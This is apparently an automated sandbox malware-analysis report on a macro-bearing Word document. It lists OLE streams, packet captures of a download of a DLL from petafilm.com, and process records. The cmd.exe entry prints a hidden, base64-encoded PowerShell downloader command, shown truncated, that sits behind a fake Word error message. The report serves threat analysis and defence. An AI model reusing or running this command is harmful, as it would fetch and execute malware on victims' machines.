                                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . l . . . . . . . T . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . . . 0 . . . . . . . 8 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . N o r m a l . d o t m .
                                    Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 f0 01 00 00 11 00 00 00 01 00 00 00 90 00 00 00 02 00 00 00 98 00 00 00 03 00 00 00 6c 01 00 00 04 00 00 00 54 01 00 00 05 00 00 00 a4 00 00 00 06 00 00 00 b0 00 00 00 07 00 00 00 bc 00 00 00 08 00 00 00 40 01 00 00 09 00 00 00 d0 00 00 00
                                    Stream Path: 1Table, File Type: data, Stream Size: 6424
                                    General
                                    Stream Path:1Table
                                    File Type:data
                                    Stream Size:6424
                                    Entropy:6.13606471955
                                    Base64 Encoded:True
                                    Data ASCII:j . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . > . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . .
                                    Data Raw:6a 04 11 00 12 00 01 00 0b 01 0f 00 07 00 03 00 03 00 03 00 00 00 04 00 08 00 00 00 98 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00
                                    Stream Path: Data, File Type: data, Stream Size: 99189
                                    General
                                    Stream Path:Data
                                    File Type:data
                                    Stream Size:99189
                                    Entropy:7.39018675385
                                    Base64 Encoded:True
                                    Data ASCII:u . . . D . d . . . . . . . . . . . . . . . . . . . . . / g . , b . r . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . j . . . . . . . . . . . . . . . . . . . c . . . 8 . . . . A . . . . ? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8 . A . C . = . > . : . . 1 . . . . . " . . . . . . . . . . . . . . . . . . . . . . . R . . . . . . . . . { . . B g . . . m d . z . M . . . . . . . . . . . . D . . . . . . . . F . . . . . . { . . B g . . . m d . z . M . . . . . . . .
                                    Data Raw:75 83 01 00 44 00 64 00 00 00 00 00 00 00 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 2f 67 eb 2c 62 01 72 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0f 00 04 f0 6a 00 00 00 b2 04 0a f0 08 00 00 00 01 04 00 00 00 0a 00 00 63 00 0b f0 38 00 00 00 04 41 01 00 00 00 3f 01 00 00 06 00 bf 01 00 00 10 00 ff 01 00 00 08 00 80 c3 14 00
                                    Stream Path: Macros/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 488
                                    General
                                    Stream Path:Macros/PROJECT
                                    File Type:ASCII text, with CRLF line terminators
                                    Stream Size:488
                                    Entropy:5.44671163464
                                    Base64 Encoded:True
                                    Data ASCII:I D = " { 3 2 8 4 0 4 E F - 4 1 6 C - 4 D E 8 - 9 A 4 2 - 2 0 1 5 6 D 2 2 2 C 2 6 } " . . D o c u m e n t = W m _ t 4 0 4 p 8 v _ / & H 0 0 0 0 0 0 0 0 . . M o d u l e = Q a f k r i m w s h o . . M o d u l e = O i 5 o e l v 0 _ s 4 . . E x e N a m e 3 2 = " T j 8 d t f s u o p d k " . . N a m e = " m w " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " 1 0 1 2 B 2 B 0 B 6 B 0 B 6 B 0 B 6 B 0 B 6 " . . D P B = " 8 2 8 0 2 0 5 0 9 3 5 1 9 3
                                    Data Raw:49 44 3d 22 7b 33 32 38 34 30 34 45 46 2d 34 31 36 43 2d 34 44 45 38 2d 39 41 34 32 2d 32 30 31 35 36 44 32 32 32 43 32 36 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 57 6d 5f 74 34 30 34 70 38 76 5f 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4d 6f 64 75 6c 65 3d 51 61 66 6b 72 69 6d 77 73 68 6f 0d 0a 4d 6f 64 75 6c 65 3d 4f 69 35 6f 65 6c 76 30 5f 73 34 0d 0a 45 78 65 4e 61 6d 65 33 32 3d
                                    Stream Path: Macros/PROJECTwm, File Type: data, Stream Size: 110
                                    General
                                    Stream Path:Macros/PROJECTwm
                                    File Type:data
                                    Stream Size:110
                                    Entropy:3.60650024781
                                    Base64 Encoded:False
                                    Data ASCII:W m _ t 4 0 4 p 8 v _ . W . m . _ . t . 4 . 0 . 4 . p . 8 . v . _ . . . Q a f k r i m w s h o . Q . a . f . k . r . i . m . w . s . h . o . . . O i 5 o e l v 0 _ s 4 . O . i . 5 . o . e . l . v . 0 . _ . s . 4 . . . . .
                                    Data Raw:57 6d 5f 74 34 30 34 70 38 76 5f 00 57 00 6d 00 5f 00 74 00 34 00 30 00 34 00 70 00 38 00 76 00 5f 00 00 00 51 61 66 6b 72 69 6d 77 73 68 6f 00 51 00 61 00 66 00 6b 00 72 00 69 00 6d 00 77 00 73 00 68 00 6f 00 00 00 4f 69 35 6f 65 6c 76 30 5f 73 34 00 4f 00 69 00 35 00 6f 00 65 00 6c 00 76 00 30 00 5f 00 73 00 34 00 00 00 00 00
                                    Stream Path: Macros/VBA/_VBA_PROJECT, File Type: data, Stream Size: 5146
                                    General
                                    Stream Path:Macros/VBA/_VBA_PROJECT
                                    File Type:data
                                    Stream Size:5146
                                    Entropy:5.51240945881
                                    Base64 Encoded:False
                                    Data ASCII:. a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 1 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 7 . \\ . V . B . E . 7 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F .
                                    Data Raw:cc 61 97 00 00 01 00 ff 09 04 00 00 09 04 00 00 e4 04 01 00 00 00 00 00 00 00 00 00 01 00 05 00 02 00 fa 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 31 00 23 00
                                    Stream Path: Macros/VBA/dir, File Type: data, Stream Size: 630
                                    General
                                    Stream Path:Macros/VBA/dir
                                    File Type:data
                                    Stream Size:630
                                    Entropy:6.3062184781
                                    Base64 Encoded:True
                                    Data ASCII:. r . . . . . . . . . . 0 * . . . . . p . . H . . " . . d . . . . . m . . 2 . 4 . . @ . . . . . Z = . . . . b . . . . . . . . . . . . a . . . % . J < . . . . . r s t d o l e > . 2 s . . t . d . o . l . . e . . . h . % ^ . . . * \\ G { 0 0 0 2 ` 0 4 3 0 - . . . . C . . . . . . . 0 0 4 6 } . # 2 . 0 # 0 # C . : \\ W i n d o w . s \\ S y s W O W . 6 4 \\ . e 2 . t l . b # O L E A u . t o m a t i o n . . ` . . . . N o r m a . l . E N . C r . m . . a . F . . . . . . . . * \\ C . . . . . . . . a . . . ! O f f i
                                    Data Raw:01 72 b2 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 22 02 00 64 e4 04 04 02 1c 6d a2 a2 32 00 34 00 00 40 02 14 06 02 14 5a 3d 02 0a 07 02 62 01 14 08 06 12 09 01 02 12 08 e2 e3 61 06 00 0c 25 02 4a 3c 02 0a 16 00 01 72 73 74 20 64 6f 6c 65 3e 02 32 73 00 00 74 00 64 00 6f 00 6c 00 a0 65 00 0d 00 68 00 25 5e 00 03 00 2a 5c 47 7b 30 30 30 32 60 30 34 33 30 2d
                                    Stream Path: WordDocument, File Type: data, Stream Size: 25134
                                    General
                                    Stream Path:WordDocument
                                    File Type:data
                                    Stream Size:25134
                                    Entropy:3.92042329439
                                    Base64 Encoded:False
                                    Data ASCII:. . . . _ . . . . . . . . . . . . . . . . . . . . . . . Y \\ . . . . b j b j . . . . . . . . . . . . . . . . . . . . . . . . . . . b . . b . . . b . . . Y T . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . F . . . . . . . F . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                    Data Raw:ec a5 c1 00 5f c0 09 04 00 00 f8 12 bf 00 00 00 00 00 00 10 00 00 00 00 00 08 00 00 59 5c 00 00 0e 00 62 6a 62 6a 00 15 00 15 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 19 04 16 00 2e 62 00 00 62 7f 00 00 62 7f 00 00 59 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00

                                    Network Behavior

                                    Network Port Distribution

                                    TCP Packets

                                    TimestampSource PortDest PortSource IPDest IP
                                    Jan 6, 2021 08:53:38.151053905 CET4916580192.168.2.22176.53.69.151
                                    Jan 6, 2021 08:53:38.240463972 CET8049165176.53.69.151192.168.2.22
                                    Jan 6, 2021 08:53:38.240595102 CET4916580192.168.2.22176.53.69.151
                                    Jan 6, 2021 08:53:38.242799044 CET4916580192.168.2.22176.53.69.151
                                    Jan 6, 2021 08:53:38.363328934 CET8049165176.53.69.151192.168.2.22
                                    Jan 6, 2021 08:53:38.363394022 CET8049165176.53.69.151192.168.2.22
                                    Jan 6, 2021 08:53:38.363435030 CET8049165176.53.69.151192.168.2.22
                                    Jan 6, 2021 08:53:38.363449097 CET4916580192.168.2.22176.53.69.151
                                    Jan 6, 2021 08:53:38.363471985 CET8049165176.53.69.151192.168.2.22
                                    Jan 6, 2021 08:53:38.363508940 CET8049165176.53.69.151192.168.2.22
                                    Jan 6, 2021 08:53:38.363518953 CET4916580192.168.2.22176.53.69.151
                                    Jan 6, 2021 08:53:38.363554955 CET8049165176.53.69.151192.168.2.22
                                    Jan 6, 2021 08:53:38.363585949 CET8049165176.53.69.151192.168.2.22
                                    Jan 6, 2021 08:53:38.363595963 CET4916580192.168.2.22176.53.69.151
                                    Jan 6, 2021 08:53:38.363616943 CET8049165176.53.69.151192.168.2.22
                                    Jan 6, 2021 08:53:38.363646984 CET8049165176.53.69.151192.168.2.22
                                    Jan 6, 2021 08:53:38.363650084 CET4916580192.168.2.22176.53.69.151
                                    Jan 6, 2021 08:53:38.363677979 CET8049165176.53.69.151192.168.2.22
                                    Jan 6, 2021 08:53:38.363708973 CET4916580192.168.2.22176.53.69.151
                                    Jan 6, 2021 08:53:38.452966928 CET8049165176.53.69.151192.168.2.22
                                    Jan 6, 2021 08:53:38.453018904 CET8049165176.53.69.151192.168.2.22
                                    Jan 6, 2021 08:53:38.453062057 CET8049165176.53.69.151192.168.2.22
                                    Jan 6, 2021 08:53:38.453098059 CET8049165176.53.69.151192.168.2.22
                                    Jan 6, 2021 08:53:38.453128099 CET8049165176.53.69.151192.168.2.22
                                    Jan 6, 2021 08:53:38.453160048 CET8049165176.53.69.151192.168.2.22
                                    Jan 6, 2021 08:53:38.453186035 CET8049165176.53.69.151192.168.2.22
                                    Jan 6, 2021 08:53:38.453236103 CET8049165176.53.69.151192.168.2.22
                                    Jan 6, 2021 08:53:38.453275919 CET8049165176.53.69.151192.168.2.22
                                    Jan 6, 2021 08:53:38.453275919 CET4916580192.168.2.22176.53.69.151
                                    Jan 6, 2021 08:53:38.453299046 CET4916580192.168.2.22176.53.69.151
                                    Jan 6, 2021 08:53:38.453305960 CET8049165176.53.69.151192.168.2.22
                                    Jan 6, 2021 08:53:38.453324080 CET4916580192.168.2.22176.53.69.151
                                    Jan 6, 2021 08:53:38.453336954 CET8049165176.53.69.151192.168.2.22
                                    Jan 6, 2021 08:53:38.453367949 CET8049165176.53.69.151192.168.2.22
                                    Jan 6, 2021 08:53:38.453378916 CET4916580192.168.2.22176.53.69.151
                                    Jan 6, 2021 08:53:38.453419924 CET8049165176.53.69.151192.168.2.22
                                    Jan 6, 2021 08:53:38.453449965 CET8049165176.53.69.151192.168.2.22
                                    Jan 6, 2021 08:53:38.453461885 CET4916580192.168.2.22176.53.69.151
                                    Jan 6, 2021 08:53:38.453481913 CET8049165176.53.69.151192.168.2.22
                                    Jan 6, 2021 08:53:38.453512907 CET8049165176.53.69.151192.168.2.22
                                    Jan 6, 2021 08:53:38.453522921 CET4916580192.168.2.22176.53.69.151
                                    Jan 6, 2021 08:53:38.453545094 CET8049165176.53.69.151192.168.2.22
                                    Jan 6, 2021 08:53:38.453577042 CET8049165176.53.69.151192.168.2.22
                                    Jan 6, 2021 08:53:38.453583956 CET4916580192.168.2.22176.53.69.151
                                    Jan 6, 2021 08:53:38.453608036 CET8049165176.53.69.151192.168.2.22
                                    Jan 6, 2021 08:53:38.453638077 CET8049165176.53.69.151192.168.2.22
                                    Jan 6, 2021 08:53:38.453645945 CET4916580192.168.2.22176.53.69.151
                                    Jan 6, 2021 08:53:38.544143915 CET8049165176.53.69.151192.168.2.22
                                    Jan 6, 2021 08:53:38.544207096 CET8049165176.53.69.151192.168.2.22
                                    Jan 6, 2021 08:53:38.544250011 CET8049165176.53.69.151192.168.2.22
                                    Jan 6, 2021 08:53:38.544286013 CET8049165176.53.69.151192.168.2.22
                                    Jan 6, 2021 08:53:38.544317007 CET4916580192.168.2.22176.53.69.151
                                    Jan 6, 2021 08:53:38.544334888 CET8049165176.53.69.151192.168.2.22
                                    Jan 6, 2021 08:53:38.544347048 CET4916580192.168.2.22176.53.69.151
                                    Jan 6, 2021 08:53:38.544373989 CET8049165176.53.69.151192.168.2.22
                                    Jan 6, 2021 08:53:38.544409990 CET8049165176.53.69.151192.168.2.22
                                    Jan 6, 2021 08:53:38.544410944 CET4916580192.168.2.22176.53.69.151
                                    Jan 6, 2021 08:53:38.544445992 CET8049165176.53.69.151192.168.2.22
                                    Jan 6, 2021 08:53:38.544481993 CET8049165176.53.69.151192.168.2.22
                                    Jan 6, 2021 08:53:38.544483900 CET4916580192.168.2.22176.53.69.151
                                    Jan 6, 2021 08:53:38.544518948 CET8049165176.53.69.151192.168.2.22
                                    Jan 6, 2021 08:53:38.544554949 CET8049165176.53.69.151192.168.2.22
                                    Jan 6, 2021 08:53:38.544568062 CET4916580192.168.2.22176.53.69.151
                                    Jan 6, 2021 08:53:38.544591904 CET8049165176.53.69.151192.168.2.22
                                    Jan 6, 2021 08:53:38.544627905 CET8049165176.53.69.151192.168.2.22
                                    Jan 6, 2021 08:53:38.544631958 CET4916580192.168.2.22176.53.69.151
                                    Jan 6, 2021 08:53:38.544667959 CET8049165176.53.69.151192.168.2.22
                                    Jan 6, 2021 08:53:38.544706106 CET4916580192.168.2.22176.53.69.151
                                    Jan 6, 2021 08:53:38.544708967 CET8049165176.53.69.151192.168.2.22
                                    Jan 6, 2021 08:53:38.544749975 CET8049165176.53.69.151192.168.2.22
                                    Jan 6, 2021 08:53:38.544786930 CET4916580192.168.2.22176.53.69.151
                                    Jan 6, 2021 08:53:38.544791937 CET8049165176.53.69.151192.168.2.22
                                    Jan 6, 2021 08:53:38.544832945 CET8049165176.53.69.151192.168.2.22
                                    Jan 6, 2021 08:53:38.544873953 CET4916580192.168.2.22176.53.69.151
                                    Jan 6, 2021 08:53:38.544881105 CET8049165176.53.69.151192.168.2.22
                                    Jan 6, 2021 08:53:38.544924974 CET8049165176.53.69.151192.168.2.22
                                    Jan 6, 2021 08:53:38.544956923 CET8049165176.53.69.151192.168.2.22
                                    Jan 6, 2021 08:53:38.544960976 CET4916580192.168.2.22176.53.69.151
                                    Jan 6, 2021 08:53:38.544986963 CET8049165176.53.69.151192.168.2.22
                                    Jan 6, 2021 08:53:38.545016050 CET8049165176.53.69.151192.168.2.22
                                    Jan 6, 2021 08:53:38.545025110 CET4916580192.168.2.22176.53.69.151
                                    Jan 6, 2021 08:53:38.545043945 CET8049165176.53.69.151192.168.2.22
                                    Jan 6, 2021 08:53:38.545074940 CET8049165176.53.69.151192.168.2.22
                                    Jan 6, 2021 08:53:38.545079947 CET4916580192.168.2.22176.53.69.151
                                    Jan 6, 2021 08:53:38.545105934 CET8049165176.53.69.151192.168.2.22
                                    Jan 6, 2021 08:53:38.545136929 CET8049165176.53.69.151192.168.2.22
                                    Jan 6, 2021 08:53:38.545141935 CET4916580192.168.2.22176.53.69.151
                                    Jan 6, 2021 08:53:38.545170069 CET8049165176.53.69.151192.168.2.22
                                    Jan 6, 2021 08:53:38.545202017 CET8049165176.53.69.151192.168.2.22
                                    Jan 6, 2021 08:53:38.545209885 CET4916580192.168.2.22176.53.69.151
                                    Jan 6, 2021 08:53:38.545233965 CET8049165176.53.69.151192.168.2.22
                                    Jan 6, 2021 08:53:38.545267105 CET8049165176.53.69.151192.168.2.22
                                    Jan 6, 2021 08:53:38.545277119 CET4916580192.168.2.22176.53.69.151
                                    Jan 6, 2021 08:53:38.545300007 CET8049165176.53.69.151192.168.2.22
                                    Jan 6, 2021 08:53:38.545334101 CET8049165176.53.69.151192.168.2.22
                                    Jan 6, 2021 08:53:38.545335054 CET4916580192.168.2.22176.53.69.151
                                    Jan 6, 2021 08:53:38.545371056 CET8049165176.53.69.151192.168.2.22
                                    Jan 6, 2021 08:53:38.545408010 CET4916580192.168.2.22176.53.69.151
                                    Jan 6, 2021 08:53:38.545427084 CET8049165176.53.69.151192.168.2.22
                                    Jan 6, 2021 08:53:38.545463085 CET8049165176.53.69.151192.168.2.22

                                    UDP Packets

                                    TimestampSource PortDest PortSource IPDest IP
                                    Jan 6, 2021 08:53:38.034178972 CET5219753192.168.2.228.8.8.8
                                    Jan 6, 2021 08:53:38.138155937 CET53521978.8.8.8192.168.2.22

                                    DNS Queries

                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                    Jan 6, 2021 08:53:38.034178972 CET192.168.2.228.8.8.80xc6ccStandard query (0)petafilm.comA (IP address)IN (0x0001)

                                    DNS Answers

                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                    Jan 6, 2021 08:53:38.138155937 CET8.8.8.8192.168.2.220xc6ccNo error (0)petafilm.com176.53.69.151A (IP address)IN (0x0001)

                                    HTTP Request Dependency Graph

                                    • petafilm.com

                                    HTTP Packets

                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    0192.168.2.2249165176.53.69.15180C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    TimestampkBytes transferredDirectionData
                                    Jan 6, 2021 08:53:38.242799044 CET0OUTGET /wp-admin/4m/ HTTP/1.1
                                    Host: petafilm.com
                                    Connection: Keep-Alive
                                    Jan 6, 2021 08:53:38.363328934 CET1INHTTP/1.1 200 OK
                                    Cache-Control: no-cache, must-revalidate
                                    Pragma: no-cache
                                    Content-Type: application/octet-stream
                                    Expires: Wed, 06 Jan 2021 07:53:49 GMT
                                    Last-Modified: Wed, 06 Jan 2021 07:53:49 GMT
                                    Server: Microsoft-IIS/10.0
                                    Set-Cookie: 5ff56c8d1a339=1609919629; expires=Wed, 06-Jan-2021 07:54:49 GMT; Max-Age=60; path=/
                                    Content-Disposition: attachment; filename="bLH.dll"
                                    Content-Transfer-Encoding: binary
                                    X-Powered-By: ASP.NET
                                    X-Powered-By-Plesk: PleskWin
                                    Date: Wed, 06 Jan 2021 07:53:48 GMT
                                    Content-Length: 192000
                                    Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 95 16 3a bb d1 77 54 e8 d1 77 54 e8 d1 77 54 e8 15 b2 99 e8 dc 77 54 e8 15 b2 9a e8 8e 77 54 e8 15 b2 9b e8 f8 77 54 e8 2d 00 eb e8 d0 77 54 e8 2d 00 e8 e8 d3 77 54 e8 d1 77 55 e8 53 77 54 e8 2d 00 ed e8 c0 77 54 e8 f6 b1 9b e8 d5 77 54 e8 f6 b1 9e e8 d0 77 54 e8 f6 b1 9d e8 d0 77 54 e8 d1 77 c3 e8 d0 77 54 e8 f6 b1 98 e8 d0 77 54 e8 52 69 63 68 d1 77 54 e8 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 ff a1 f3 5f 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0b 00 00 be 00 00 00 4a 02 00 00 00 00 00 dc 45 00 00 00 10 00 00 00 d0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 30 03 00 00 04 00 00 00 00 00 00 02 00 00 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 f0 19 01 00 cb 00 00 00 8c 0f 01 00 b4 00 00 00 00 50 01 00 20 b2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 03 00 a0 0c 00 00 10 d2 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 05 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 c8 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 19 bd 00 00 00 10 00 00 00 be 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 bb 4a 00 00 00 d0 00 00 00 4c 00 00 00 c2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 9c 2d 00 00 00 20 01 00 00 10 00 00 00 0e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 20 b2 01 00 00 50 01 00 00 b4 01 00 00 1e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 48 1a 00 00 00 10 03 00 00 1c 00 00 00 d2 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                    Data Ascii: MZ@!L!This program cannot be run in DOS mode.$:wTwTwTwTwTwT-wT-wTwUSwT-wTwTwTwTwwTwTRichwTPEL_!JE0P 8@.text `.rdataJL@@.data- @.rsrc P@@.relocH@B


                                    Code Manipulations

                                    Statistics

                                    Behavior

                                    Click to jump to process

                                    System Behavior

                                    Analysis Process: WINWORD.EXE PID: 2308 Parent PID: 584

                                    General

                                    Start time:08:53:37
                                    Start date:06/01/2021
                                    Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                    Wow64 process (32bit):false
                                    Commandline:'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
                                    Imagebase:0x13f480000
                                    File size:1424032 bytes
                                    MD5 hash:95C38D04597050285A18F66039EDB456
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high

                                    Analysis Process: cmd.exe PID: 2288 Parent PID: 1220

                                    General

                                    Start time:08:53:39
                                    Start date:06/01/2021
                                    Path:C:\Windows\System32\cmd.exe
                                    Wow64 process (32bit):false
                                    Commandline:cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD JAA5ADUAWABVAGMARAAgACAAPQAgACAAWwBUAFkAcABFAF0AKAAiAHsAMAB9AHsAMgB9AHsANAB9AHsAMwB9AHsAMQB9ACIAIAAtAGYAJwBTAFkAUwBUAGUAJwAsACcAQwBUAE8AUgB5ACcALAAnAE0AJwAsACcAUgBFACcALAAnAC4AaQBvAC4AZABJACcAKQAgACAAOwAgACAAcwBFAFQALQBJAHQARQBtACAAIAAoACcAVgAnACsAJwBhAHIAaQBBAEIATABlACcAKwAnADoARgBJAFUAJwApACAAIAAoACAAIABbAHQAeQBwAEUAXQAoACIAewAxAH0AewA0AH0AewAwAH0AewA2AH0AewA1AH0AewAzAH0AewAyAH0AIgAgAC0AZgAnAE0ALgBuAEUAVAAuAFMAZQBSACcALAAnAHMAWQBzAHQAJwAsACcAVABNAGEATgBBAEcAZQByACcALAAnAE4AJwAsACcARQAnACwAJwBJACcALAAnAHYASQBjAEUAUABvACcAKQApADsAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACcAUwBpACcAKwAoACcAbABlACcAKwAnAG4AJwApACsAKAAnAHQAJwArACcAbAB5AEMAJwApACsAKAAnAG8AJwArACcAbgB0ACcAKQArACgAJwBpACcAKwAnAG4AdQBlACcAKQApADsAJABIAGMANgBjADYAdQB5AD0AJABJADcANgBDACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABUADMANgBTADsAJABWADAANgBCAD0AKAAnAEkAMwAnACsAJwA5AEgAJwApADsAIAAgACgAZwBjAEkAIAAoACIAVgBBACIAKwAiAHIAaQBBAEIAIgArACIAbAAiACsAIgBFADoAOQA1ACIAKwAiAFgAdQBDAGQAIgApACAAIAApAC4AVgBhAEwAVQBlADoAOgAiAGMAUgBlAGEAVABgAEUAZABgAEkAUgBgAEUAYABDAFQATwBSAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB7ADAAfQBDADMAcgBlACcAKwAnADUAYwAzAHsAMAB9ACcAKwAnAEQAaQAnACsAJwBfAHAAJwArACcAMwAnACsAJwBjADkAJwArACcAewAwAH0AJwApAC0AZgAgAFsAQwBIAEEAUgBdADkAMgApACkAOwAkAEQAMQA1AEIAPQAoACgAJwBHADIAJwArACcAOAAnACkAKwAnAE8AJwApADsAIAAkAGYAaQB1ADoAOgAiAHMAZQBgAGMAYABVAHIASQBUAFkAcABSAG8AVABPAGAAYwBPAEwAIgAgAD0AIAAoACgAJwBUACcAKwAnAGwAcwAnACkAKwAnADEAMgAnACkAOwAkAFIAMwAyAEYAPQAoACcARwAnACsAKAAnADEANgAnACsAJwBaACcAKQApADsAJABDADcAegBpADkAdQB1ACAAPQAgACgAJwBPACcAKwAoACcAXwAnACsAJwA1AFoAJwApACkAOwAkAFcAXwAxAEQAPQAoACcARQAnACsAKAAnADEAOQAnACsAJwBUACcAKQApADsAJABXADcAaQBvADAAdwBnAD0AJABIAE8ATQBFACsAKAAoACcAewAwAH0AJwArACgAJwBDACcAKwAnADMAcgBlADUAJwApACsAJwBjADMAJwArACcAewAnACsAJwAwAH0ARABpAF8AcAAzAGMAJwArACcAOQB7ACcAKwAnADAAfQAnACkALQBGAFsAQwBoAGEAcgBdADkAMgApACsAJABDADcAegBpADkAdQB1ACsAKAAnAC4AZAAnACsAJwBsAGwAJwApADsAJABIADMANgBBAD0AKAAnAFIAJwArACgAJwA2AF8AJwArACcATwAnACkAKQA7ACQARwByADYAeABfAGgAXwA9ACgAKAAnAF0AYQAnACsAJwBuAHcAWwAzACcAKwAnADoALwAnACkAKwAnAC8AJwArACgAJwBwACcAKwAnAGUAdABhAGYAJwApACsAKAAnAGkAbABtACcAKwAnAC4AYwBvACcAKQArACcAbQAnACsAKAAnAC8AdwAnACsAJwBwACcAKQArACgA